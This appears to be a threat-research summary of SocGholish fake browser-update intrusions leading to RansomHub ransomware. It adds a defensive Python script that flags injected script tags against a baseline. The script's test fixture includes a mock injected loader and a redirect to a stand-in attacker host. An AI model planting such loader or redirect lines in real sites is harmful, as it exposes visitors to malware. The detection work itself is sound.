SocGholish’s Intrusion Techniques Facilitate Distribution of RansomHub Ransomware www.trendmicro.com/en_us/res…
SocGholish, also known as FakeUpdates, is a malware-as-a-service (MaaS) framework first observed in 2018, and Trend Research has been closely monitoring its activities since. Trend Micro tracks this particular intrusion set under the name Water Scylla; its activities lead to RansomHub ransomware deployment.
SocGholish is characterised by a highly obfuscated JavaScript loader that employs a range of evasion techniques to bypass traditional signature-based detection.
The primary method of propagation for SocGholish involves the compromise of legitimate websites. Threat actors inject malicious scripts into these sites to hijack user traffic. When users visit these compromised sites, they are redirected to deceptive webpages that masquerade as legitimate browser update notifications. Through social engineering tactics, users are convinced to download a malicious ZIP file. This file contains a JavaScript file, which is the SocGholish loader.
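Because the infection chain starts with a script injected into an otherwise legitimate site, a site owner can catch the compromise by diffing the page's script tags against a known-good baseline. The following is an added example written for this article, not code from Trend Micro or from the SocGholish analysis: it inventories external `<script src>` hosts and hashes of inline scripts, then reports anything not in the allowlist or baseline. The page content, the `cdn.example.net` allowlisted host and the `attacker.invalid` injection are constructed for illustration.

```python
"""Baseline check for injected <script> tags on a web page.

Added example (not from the Trend Micro post). The HTML, the allowlisted
CDN host and the attacker domain below are constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collects external script src values and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values, in document order
        self.inline = []     # sha256 hex digests of inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src.strip())
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands the raw body of a <script> element to handle_data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            body = "".join(self._buf).strip()
            self.inline.append(hashlib.sha256(body.encode()).hexdigest())
            self._in_script = False


def script_inventory(html):
    """Return {'external': [src, ...], 'inline': [sha256, ...]} for a page."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return {"external": p.external, "inline": p.inline}


def find_injected(html, allowed_hosts, baseline_inline_hashes):
    """Findings are (kind, value) tuples: external scripts whose host is not
    allowlisted, and inline scripts whose hash is not in the baseline.
    Relative and protocol-relative src values resolve to the site itself
    (empty netloc) and are treated as first-party."""
    inv = script_inventory(html)
    findings = []
    for src in inv["external"]:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("external", src))
    for digest in inv["inline"]:
        if digest not in baseline_inline_hashes:
            findings.append(("inline", digest))
    return findings


# Constructed known-good page (the baseline captured at deploy time).
CLEAN_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script>window.siteConfig = {lang: "en"};</script>
</head><body>hello</body></html>"""

# The same page after a hypothetical compromise: one remote loader plus an
# inline stub standing in for an injected redirector to a fake-update lure.
COMPROMISED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="https://attacker.invalid/loader.js"></script>\n'
    '<script>location.replace("https://attacker.invalid/update");</script>\n'
    "</head>",
)

ALLOWED_HOSTS = {"cdn.example.net"}                              # assumed CDN
BASELINE_INLINE = set(script_inventory(CLEAN_PAGE)["inline"])   # captured once

if __name__ == "__main__":
    for kind, what in find_injected(COMPROMISED_PAGE, ALLOWED_HOSTS, BASELINE_INLINE):
        print(f"UNEXPECTED {kind} script: {what}")
```

Run this from a scheduled job against the live page (or the files on disk) and alert on any finding; the inline-hash baseline must be refreshed whenever a legitimate deploy changes an inline script, otherwise every release will look like an injection.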
This blog entry focuses on a cluster that deploys backdoor components to enable initial access for RansomHub ransomware-as-a-service (RaaS) affiliates. RansomHub is among the top ransomware operations by number of organisations impacted by data breaches, ranking third behind CL0P in first place and Akira in second, and SocGholish is a key enabler of these attacks.